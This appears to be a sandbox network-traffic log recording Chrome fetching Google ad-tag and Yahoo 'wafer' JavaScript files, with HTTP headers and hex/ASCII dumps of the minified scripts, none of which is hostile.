                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Mon, 30 Sep 2024 17:21:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: private, max-age=900, stale-while-revalidate=3600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: 626 / 19996 / m202409240101 / config-hash: 15818932235782585000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 107781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC603INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 73 74 74 63 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 29 7b 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 28 29 3b 7d 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 5f 6c 6f 61 64 65 64 5f 29 72 65 74 75 72 6e 3b 76 61 72 20 6e 2c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 2c 62 61 3d 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 2c 64 61 3d 63 61 28 74 68 69 73 29 2c 65 61 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 74 3d 7b 7d 2c 66 61 3d 7b 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 63 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 63 3d 66 61 5b 62 5d 3b 69 66 28 63 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 63 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 2c 77 3d 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 61 28 61 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 76 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 2c 6a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 61 2c 61 29 7d 2c 69 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 72 61 77 3d 62 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 26 26 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 61 29 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 62 29 29 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :function(){return ha(aa(this))}})}return a},"es6");var ha=function(a){a={next:a};a[v(t.Symbol,"iterator")]=function(){return this};return a},ja=function(a){return ia(a,a)},ia=function(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b));return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 20 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 63 21 3d 22 70 72 6f 74 6f 74 79 70 65 22 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 62 2c 63 29 3b 64 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 63 2c 64 29 7d 65 6c 73 65 20 61 5b 63 5d 3d 62 5b 63 5d 3b 61 2e 7a 62 3d 62 2e 70 72 6f 74 6f 74 79 70 65 7d 2c 75 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.zb=b.prototype},ua=function(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 73 2e 67 29 3f 64 65 6c 65 74 65 20 67 5b 64 5d 5b 74 68 69 73 2e 67 5d 3a 21 31 7d 3b 72 65 74 75 72 6e 20 66 7d 2c 22 65 73 36 22 29 3b 77 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 76 28 61 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 6e 74 72 69 65 73 22 29 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 78 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s.g)?delete g[d][this.g]:!1};return f},"es6");w("Map",function(a){if(function(){if(!a||typeof a!="function"||!v(a.prototype,"entries")||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(x([[h,"s"]]));if(k.get(h)!="s"||k.size!=1|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 6b 65 79 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 76 61 6c 75 65 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 76 28 74 68 69 73 2c 22 65 6e 74 72 69 65 73 22 29 2e 63 61 6c 6c 28 74 68 69 73 29 2c 71 3b 21 28 71 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 71 3d 71 2e 76 61 6c 75 65 2c 68 2e 63 61 6c 6c 28 6b 2c 71 5b 31 5d 2c 71 5b 30 5d 2c 74 68 69 73 29 7d 3b 63 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eturn e(this,function(h){return h.key})};c.prototype.values=function(){return e(this,function(h){return h.value})};c.prototype.forEach=function(h,k){for(var l=v(this,"entries").call(this),q;!(q=l.next()).done;)q=q.value,h.call(k,q[1],q[0],this)};c.prototy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 29 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 64 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 63 3d 3d 3d 30 3f 30 3a 63 3b 74 68 69 73 2e 67 2e 73 65 74 28 63 2c 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 74 68 69 73 2e 67 2e 64 65 6c 65 74 65 28 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 63 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: )).done;)this.add(d.value)}this.size=this.g.size};b.prototype.add=function(c){c=c===0?0:c;this.g.set(c,c);this.size=this.g.size;return this};b.prototype.delete=function(c){c=this.g.delete(c);this.size=this.g.size;return c};b.prototype.clear=function(){thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 77 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 76 61 28 74 68 69 73 2c 62 2c 22 69 6e 63 6c 75 64 65 73 22 29 2e 69 6e 64 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 2c 22 65 73 36 22 29 3b 77 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: gular expression");return a+""};w("String.prototype.includes",function(a){return a?a:function(b,c){return va(this,b,"includes").indexOf(b,c||0)!==-1}},"es6");w("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 67 3e 3d 66 7d 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 77 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 2b 3d 22 22 29 3b 76 61 72 20 63 3d 30 2c 64 3d 21 31 2c 65 3d 7b 6e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 64 26 26 63 3c 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 63 2b 2b 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 62 28 66 2c 61 5b 66 5d 29 2c 64 6f 6e 65 3a 21 31 7d 7d 64 3d 21 30 3b 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 7d 3b 65 5b 76 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eturn!1;return g>=f}},"es6");var wa=function(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[v(t.Symbol,"iterator")]=function(){return e};
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1390INData Raw: 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 76 61 72 20 7a 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 79 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 78 61 28 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 29 3b 61 3d 63 26 26 63 5b 61 5d 3b 72 65 74 75 72 6e 20 61 21 3d 6e 75 6c 6c 3f 61 3a 62 7d 2c 78 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 7a 2c 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: osure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var z=this||self,ya=function(a,b){var c=xa("CLOSURE_FLAGS");a=c&&c[a];return a!=null?a:b},xa=function(a){a=a.split(".");for(var b=z,c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;retur


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    93192.168.2.44985187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC537OUTGET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: QuYjYepaFxAIO/jYKQB1WNeZQFiPH7MUca44UEQ39riJQCbRfMQ7URDTP02c4du07iaed7o7MjlRYpabWud/uTY5uIHnTxCDqRCdWD9y5rg=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: Y29V51TFVZHZF44T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Wed, 25 Sep 2024 17:04:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 23 Aug 2021 06:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "956dabf4d28930bc42d934995b814d6d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: 8acCB8Oldv6HTX7VU3iQtZux9BoZJqhX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 3412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 432988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 65 78 74 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 65 78 74 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC812INData Raw: 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 66 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 76 61 72 20 69 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 66 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 6c 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 5f 75 74 69 6c 3d 75 28 7b 7d 2c 69 2e 5f 75 74 69 6c 2c 7b 65 6c 65 6d 3a 65 7d 29 2c 69 2e 73 74 61 74 65 44 69 64 55 70 64 61 74 65 28 29 2c 69 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 73 28 74 2c 5b 7b 6b 65 79 3a 22 73 74 61 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: length>1&&void 0!==arguments[1]?arguments[1]:{},f=r.selector;o(this,t);var i=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:f},{STATE_ATTRS:l}));return i._util=u({},i._util,{elem:e}),i.stateDidUpdate(),i}return f(t,e),s(t,[{key:"stat


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    94192.168.2.44985487.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC537OUTGET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: ms5Tl8LmcPid2rthG5m1C+DagQEU2X09HrxBSWWWzLAeMg/zIlfDKoUHo49spShXMmeLL0FWd0Y=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 9D2W447Q478T70P8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Wed, 25 Sep 2024 14:17:46 GMT
